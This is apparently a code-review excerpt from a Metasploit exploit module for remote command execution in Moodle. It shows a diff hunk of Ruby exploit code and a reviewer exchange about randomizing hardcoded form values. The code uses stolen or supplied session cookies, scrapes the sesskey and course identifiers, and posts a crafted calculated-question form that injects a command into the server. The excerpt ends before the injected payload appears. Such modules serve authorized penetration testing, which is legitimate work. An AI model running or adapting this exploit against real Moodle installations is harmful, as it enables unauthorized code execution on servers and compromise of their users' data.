modules/exploits/linux/http/moodle_rce.rb

```diff
@@ -0,0 +1,320 @@
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    print_status('Obtaining sesskey, courseContextId, and category...')
+    vprint_status('Obtaining sesskey...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'headers' => {
+        'Cookie' => "MoodleSession=#{moodlesession}; MOODLEID1_=#{moodleid1}"
+      },
+      'uri' => normalize_uri(target_uri.path, "moodle/mod/quiz/edit.php?cmid=#{datastore['CMID']}") # get dynamically later
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+
+    html = res.get_html_document
+    sesskey = html.to_s.match(/"sesskey":"([^"]+)"/)[1]
+
+    unless sesskey
+      fail_with(Failure::UnexpectedReply, 'sesskey not found.')
+    end
+    vprint_status("sesskey: #{sesskey}")
+
+    course_context_id = html.to_s.match(/"courseContextId":(\d+)/)[1]
+
+    unless course_context_id
+      fail_with(Failure::UnexpectedReply, 'courseContextId not found.')
+    end
+
+    vprint_status("courseContextId: #{course_context_id}")
+
+    category = html.to_s.match(/;category=(\d+)/)[1]
+
+    unless category
+      fail_with(Failure::UnexpectedReply, 'category not found.')
+    end
+
+    vprint_status("category: #{category}")
+
+    print_status('Injecting command...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'moodle/question/bank/editquestion/question.php'),
+      'headers' => {
+        'Cookie' => "MoodleSession=#{moodlesession}; MOODLEID1_=#{moodleid1}"
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'initialcategory' => '1',
+        'reload' => '1',
+        'shuffleanswers' => '1',
+        'answernumbering' => 'abc',
+        'mform_isexpanded_id_answerhdr' => '1',
+        'noanswers' => '1',
+        'nounits' => '1',
+        'numhints' => '2',
+        'synchronize' => nil,
+        'wizard' => 'datasetdefinitions',
+        'id' => nil,
+        'inpopup' => '0',
+        'cmid' => datastore['CMID'].to_s,
+        'courseid' => datastore['COURSEID'].to_s,
+        'returnurl' => "/mod/quiz/edit.php?cmid=#{datastore['CMID']}&addonpage=0",
+        'mdlscrollto' => '0',
+        'appendqnumstring' => 'addquestion',
+        'qtype' => 'calculated',
+        'makecopy' => '0',
+        'sesskey' => sesskey.to_s,
+        '_qf__qtype_calculated_edit_form' => '1',
+        'mform_isexpanded_id_generalheader' => '1',
+        'mform_isexpanded_id_unithandling' => '0',
+        'mform_isexpanded_id_unithdr' => '0',
+        'mform_isexpanded_id_multitriesheader' => '0',
+        'mform_isexpanded_id_tagsheader' => '0',
+        'category' => "#{category},#{course_context_id}",
+        'name' => 'XXXXXXXXXXXXXXXX',
```

Comment:
Could this, and maybe some of the other values being sent here, be randomized?

Reply:
Yes, I used hardcoded values to get an initial PoC working. I'll see which ones I can randomize and update the code accordingly.